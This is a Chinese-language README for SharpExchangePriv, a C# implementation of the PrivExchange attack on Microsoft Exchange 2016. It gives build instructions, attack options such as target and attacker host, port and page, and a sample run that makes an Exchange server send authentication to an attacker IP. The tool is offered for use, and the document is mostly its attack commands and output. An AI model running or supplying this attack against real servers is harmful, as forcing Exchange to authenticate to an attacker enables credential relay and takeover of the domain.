PrivExchange 的 C# 实现,作者 @_dirkjan。感谢 @g0ldenGunSec,因为我的代码依赖了他的代码。
已在 Exchange 2016 上测试过。
SharpExchangePriv 基于 .NET 3.5 构建,并与 Visual Studio 2017 兼容。只需打开解决方案文件并生成项目即可。
我使用了 CommandLineParser 来解析参数。这将创建 CommandLine.dll 文件以及可执行文件。你可以简单地将 .exe 和 .dll 合并为一个可执行文件:
ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll
--targetHost设置目标主机的 IP。
--attackerHost设置攻击者的 IP
--attackerPort设置攻击者的端口
--attackerPage设置攻击者的页面
--ssl启用 SSL
--exchangeVersion设置 Exchange 版本,默认为 2016
--exchangePort设置 Exchange 目标端口
C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
/$$$$$$$ /$$ /$$$$$$$$ /$$
| $$__ $$ |__/ | $$_____/ | $$
| $$ \ $$ /$$$$$$ /$$ /$$ /$$| $$ /$$ /$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$
| $$$$$$$//$$__ $$| $$| $$ /$$/| $$$$$ | $$ /$$/ /$$_____/| $$__ $$ |____ $$| $$__ $$ /$$__ $$ /$$__ $$
| $$____ /| $$ \__ /| $$ \ $$/$$/ | $$__ / \ $$$$/ | $$ | $$ \ $$ /$$$$$$$| $$ \ $$| $$ \ $$| $$$$$$$$
| $$ | $$ | $$ \ $$$/ | $$ >$$ $$ | $$ | $$ | $$ /$$__ $$| $$ | $$| $$ | $$| $$_____ /
| $$ | $$ | $$ \ $/ | $$$$$$$$ /$$/\ $$| $$$$$$$| $$ | $$| $$$$$$$| $$ | $$| $$$$$$$| $$$$$$$
|__/ |__/ |__/ \_/ |________/|__/ \__/ \_______/|__/ |__/ \_______/|__/ |__/ \____ $$ \_______/
/$$ \ $$
| $$$$$$/
\______ /
@den_n1s
The target URL is https://192.168.11.10:443/EWS/Exchange.asmx
Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx
HTTP 200 response received, the target Exchange server should be authenticating shortly.
请将任何错误提交到 Github 项目页面,或者通过 Twitter 联系我 @den_n1s